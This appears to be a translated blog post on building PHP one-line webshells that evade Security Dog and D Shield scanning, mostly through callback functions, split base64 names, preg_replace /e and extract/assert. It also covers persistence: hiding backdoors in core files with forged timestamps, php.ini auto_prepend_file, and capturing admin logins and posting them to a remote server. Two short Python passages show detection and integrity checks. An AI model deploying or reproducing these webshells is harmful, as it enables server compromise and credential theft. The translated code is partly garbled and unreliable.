PHP one-line backdoors and the many ways past Security Dog: backdoor construction and hiding

Source: Internet
Author: User
Tags php class phpinfo

The second chapter mainly gives you some ideas for backdoor construction, and covers Security Dog's file signature detection mechanism.

In addition, this article requires you to have a certain understanding of PHP.

This chapter is divided into three parts. The first part covers the basics: an analysis of how Chopper's PHP code executes. Building on that, the second part mainly summarizes backdoor techniques that can be used; in this part I mainly share a collection of backdoors, in the hope of broadening our thinking.

Statement: most of the backdoor structures and ideas used as examples here may resemble ones already online; if any are the same, come hit me!

At present, mainstream WAF software (such as Security Dog) generally applies both active and passive scanning to backdoor files. Active scanning is easy to understand; passive scanning mainly means the file is scanned at the moment you access it, for example when you connect to it with Chopper.

Security Dog's backdoor scanning is in effect a pre-compilation of the code: it strips comments and other useless code and, when it encounters an if, checks the contents of the if body directly.

We cannot know everything in the signature libraries of Security Dog and other WAFs; all we can do is experiment a little. WAFs are always being updated and hackers are forever changing their routines, so there is almost no once-and-for-all backdoor.

Note: to get past the dog properly you really need to know PHP. To accommodate readers who do not, this article shares some sneaky ideas to make up for it.

Let's start with the simplest dog bypass.

Here are a few one-liners to share that can get past the dog directly. They are very simple, but first let's take the dog for a walk.

<?php $_get[a] ($_get[b]);? >

This one-liner can already execute any command, but it is certain to be detected.

We can use the extract function to do some simple processing of the request data.

Of course, to get past the dog completely and execute more commands, processing at the data layer is also needed; see Chapter three for details.

The classic callback function

Wrapping a variable in a layer of encoding often does not make it safe; in fact, many WAFs are very sensitive to base64_decode.

For example:

@array_map (Base64_decode ($_request[' xx '), (array) base64_decode ($_request[' Sofia '));

Principle analysis: the xx parameter passes in an assert function directly, and the sofia parameter passes in assert(eval('code to execute')).

With array_map the backdoor is reported straight away. What about removing the base64?

Yes, it is that simple: the most dangerous place is the safest place. At least Security Dog's file signature check does not detect it.

However, D Shield rates this one-liner at level four, because anyone with a little experience can see it is a backdoor.

But this is still far from actually getting past the dog; data processing is also needed, as detailed in Chapter three. After that, you will find that this one-liner completes the bypass once the POST data is modified.

Without further suspense:

@array_map (Assert, (array) base64_decode ($_request[' Sofia '));

Connection method: test.php?sofia=yxnzzxj0kcrfukvrvuvtvfsndnvsbiddkq== Password: vuln

One more callback backdoor.

< $Base = "Base6". " 4 "." _decod "." E "; $_clasc = $Base ($_request[' vuln ')); $arr = Array ($Base ($_post[' sofia ']) = | *|e ',); @array_walk ($arr, $_CLASC, ");? >

This is a version I modified earlier. It is actually the preg_replace backdoor, again implemented through a callback function, and it also gets through.

In detail, with these parameters passed in:

VULN=CHJLZ19YZXBSYWNL (Preg_replace)

SOFIA=CGHWAW5MBYGP (Phpinfo ())

< $Base = "Base6". " 4 "." _decod "." E "; $_clasc = $Base ($_request[' vuln ');//$_clasc=preg_replace$arr = Array ($Base ($_post[' sofia ']) = | *|e ',); $arr = Array (' phpinfo () ' = ' |. *|e ') @array_walk ($arr, $_CLASC, "); Preg_replace (' |. *|e ', phpinfo (), ')?>

There are plenty of ready-made callback functions and other ways around signature detection online, so I will not reinvent the wheel here.
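Seen from the detection side, the snippets above only get past a scanner that matches raw text. The following added example (not from the original article, and not Security Dog's or D Shield's actual rules) strips comments and folds split string literals before matching, as the pre-compilation step described earlier implies a scanner must; the rule names, regexes and sample files are assumptions constructed for illustration, and the last rule covers the log-file include shown under Method One.

```python
import re

# Added heuristics for the features this article names; not Security Dog's or any WAF's real rules.
REQ = r"\$_(?:get|post|request|cookie)\b"
RULES = {
    "variable-function call on request data":
        re.compile(REQ + r"\s*\[[^\]]*\]\s*\(", re.I),
    "callback function fed request data":
        re.compile(r"\b(?:array_map|array_walk|call_user_func)\s*\([^;]*" + REQ, re.I),
    "extract() on request data":
        re.compile(r"\bextract\s*\(\s*" + REQ, re.I),
    "preg_replace-style pattern with /e modifier":
        re.compile(r"""['"]([|/#~]).*?\1[a-z]*e[a-z]*['"]""", re.I),
    "sensitive function name held in a string":
        re.compile(r"""['"](?:base64_decode|assert|eval|preg_replace)['"]""", re.I),
    "include of a log file":
        re.compile(r"""\b(?:require|include)(?:_once)?\b[\s(]*['"][^'"]*\.log['"]""", re.I),
}
LITERAL_CONCAT = re.compile(r"""(['"])((?:(?!\1).)*)\1\s*\.\s*(['"])((?:(?!\3).)*)\3""")

def normalize(src):
    """Strip /* */ and // comments, then fold "a"."b" literal concatenation until stable."""
    src = re.sub(r"/\*.*?\*/", " ", src, flags=re.S)
    src = re.sub(r"(?<!:)//[^\n]*", "", src)
    prev = None
    while prev != src:
        prev = src
        src = LITERAL_CONCAT.sub(lambda m: '"' + m.group(2) + m.group(4) + '"', src)
    return src

def scan(src):
    """Return the sorted names of every rule that matches the normalized source."""
    norm = normalize(src)
    return sorted(name for name, rx in RULES.items() if rx.search(norm))

# Constructed samples modelled on the snippets in this article, plus one benign file.
SAMPLES = {
    "split_name.php": '<?php $b = "Base6"."4"."_decod"."e"; $c = $b($_REQUEST["k"]); ?>',
    "callback.php": "<?php @array_map/* x */(assert, (array) $_REQUEST['p']); ?>",
    "benign.php": "<?php $u = array_map('strtoupper', $rows); // extract($_POST)\n?>",
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(name, scan(src))
```

These are triage heuristics: a hit means the file deserves a manual look, and the /e rule in particular will also match ordinary path-like strings that end in a lone "e" segment.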

Hiding the code

Maintaining access is also an important part of penetration testing. A backdoor that is not hidden well loses its access the next day; a sneaky one can persist indefinitely.

Method One: Remote read or include file

This method is fairly common, for example:

<?php
if ($_post[' token '] = = ' Sofia ') {
Require ' home/wwwlogs/access.log ';
}

But personally, I can spot this at a glance: what normal program would go out of its way to include a log file or an image? Of course, it depends on the scenario.

Method Two:

Put the code into a core function file and modify the file's timestamp. As long as scanning does not flag it, the average webmaster will not touch core files, so this also gives a degree of concealment.

Method Three: Create a class or function, separate the backdoor code

This is basically very hard to detect. For example, create a class or function in a file such as global_function.php, then instantiate the class or call the function in a related file that calls the core functions; the code then executes as expected.

For example: put the class into a core class file and put the executing code into a related calling file; concealment is much stronger.

<?php
Class Parse_args {

Public Function Apply_filters ($key) {
ASSERT ($key);
}
}

Execute code
@extract ($_request);
$reflectionMethod = new Parse_args ();
$reflectionMethod-apply_filters ($s 0fia);

?>

Method Four: Encrypt the code directly

Encrypt the backdoor file directly.

In fact, this is just the result of encrypting eval($_POST[x]); what more is there to construct? However, its usability during a penetration test is not very high: many times such backdoor code cannot be written at all, so it serves only as a means of maintaining access.

Method Five: Create a manual backdoor

PHP can read not only GET and POST data but also server data such as User-Agent, Referer, Cookie and client IP, so the code to be executed can be placed in these parameters. Note, however, that some of these parameters are recorded in logs. This only provides the idea; adapt it to the actual situation.

Method Five: Indirectly maintain back-end access

Code that captures usernames and passwords can be added directly to the back-end login page or to the core functions it includes, for example writing them to a TXT file on the local server (which can be encrypted) and remembering the hidden URL, so that password records appear from time to time, or posting the passwords to a remote server of one's own.

An XSS can also be inserted into a back-end page; this is relatively inefficient but is another approach.

Method Six: The hard way

This method only works against small and medium-sized webmasters: find a core but rarely used file of the site, such as a lang file, add the backdoor to it, encrypt the entire file and replace the source file. Everything functions normally, and the webmaster will not be too suspicious of such files.

This idea can also be combined with method three.

Method Seven: php.ini backdoor

Modify the php.ini configuration so that a backdoor executes on every page, making every PHP file a backdoor; for example, auto_prepend_file can be configured to load a file automatically. I will write this part up separately later.
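The hiding methods above rely on nobody comparing core files or php.ini against a known-good state. The following added example (not from the original article) shows a content-hash baseline that a forged file timestamp does not defeat, together with a check for a non-empty auto_prepend_file or auto_append_file; the function names and the manifest layout are assumptions made for illustration.

```python
import hashlib, os, re

def build_manifest(root):
    """Map relative path -> SHA-256 for every file under root (run on a known-good deploy)."""
    out = {}
    for d, _, files in os.walk(root):
        for f in files:
            p = os.path.join(d, f)
            with open(p, "rb") as fh:
                out[os.path.relpath(p, root)] = hashlib.sha256(fh.read()).hexdigest()
    return out

def diff_manifest(baseline, current):
    """Compare by content, so a reset modification time does not hide a changed core file."""
    return {
        "changed": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }

AUTO_RX = re.compile(r"^\s*(auto_prepend_file|auto_append_file)\s*=\s*(.*?)\s*$", re.I)

def audit_ini(text):
    """Return {directive: value} for auto_prepend_file / auto_append_file set to a real path."""
    found = {}
    for line in text.splitlines():
        line = line.split(";", 1)[0]          # ';' starts a comment in php.ini
        m = AUTO_RX.match(line)
        if not m:
            continue
        value = m.group(2).strip("\"'")
        if value and value.lower() != "none":  # empty or "none" means nothing is auto-loaded
            found[m.group(1).lower()] = value
    return found
```

Store the baseline manifest off the web server, and run audit_ini over every php.ini and per-directory .user.ini that the PHP runtime loads.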
